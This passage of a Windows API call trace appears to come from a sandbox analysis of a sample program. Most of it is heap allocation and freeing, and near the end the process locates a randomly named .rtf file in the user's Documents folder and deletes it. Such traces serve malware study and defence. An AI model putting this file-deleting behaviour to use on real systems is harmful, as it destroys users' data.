hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.089] CloseHandle (hObject=0x2a0) returned 1 [0267.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0267.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.093] CloseHandle (hObject=0x2d0) returned 1 [0267.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0267.097] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0267.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe8daa8 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.105] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.105] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e558d8 [0267.106] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pTQouiVh4lNVdQWF_W.rtf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf", lpFilePart=0x8cedf4*="pTQouiVh4lNVdQWF_W.rtf") returned 0x30 [0267.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.106] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ptqouivh4lnvdqwf_w.rtf")) returned 0x20 [0267.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25cc7eb0, ftCreationTime.dwHighDateTime=0x1d5e554, ftLastAccessTime.dwLowDateTime=0x29510eb0, ftLastAccessTime.dwHighDateTime=0x1d5e65e, ftLastWriteTime.dwLowDateTime=0x29510eb0, ftLastWriteTime.dwHighDateTime=0x1d5e65e, nFileSizeHigh=0x0, nFileSizeLow=0xf68f, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pTQouiVh4lNVdQWF_W.rtf", cAlternateFileName="PTQOUI~1.RTF")) returned 0xa872d0 [0267.112] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ptqouivh4lnvdqwf_w.rtf")) returned 1 [0267.185] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25cc7eb0, ftCreationTime.dwHighDateTime=0x1d5e554, ftLastAccessTime.dwLowDateTime=0x29510eb0, ftLastAccessTime.dwHighDateTime=0x1d5e65e, ftLastWriteTime.dwLowDateTime=0x29510eb0, ftLastWriteTime.dwHighDateTime=0x1d5e65e, nFileSizeHigh=0x0, nFileSizeLow=0xf68f, dwReserved0=0x1, dwReserved1=0x1c, cFileName="pTQouiVh4lNVdQWF_W.rtf", cAlternateFileName="PTQOUI~1.RTF")) returned 0 [0267.185] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.186] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.186] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e558d8 [0267.187] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pTQouiVh4lNVdQWF_W.rtf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf", lpFilePart=0x8cf650*="pTQouiVh4lNVdQWF_W.rtf") returned 0x30 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.187] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\pTQouiVh4lNVdQWF_W.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ptqouivh4lnvdqwf_w.rtf")) returned 0xffffffff [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 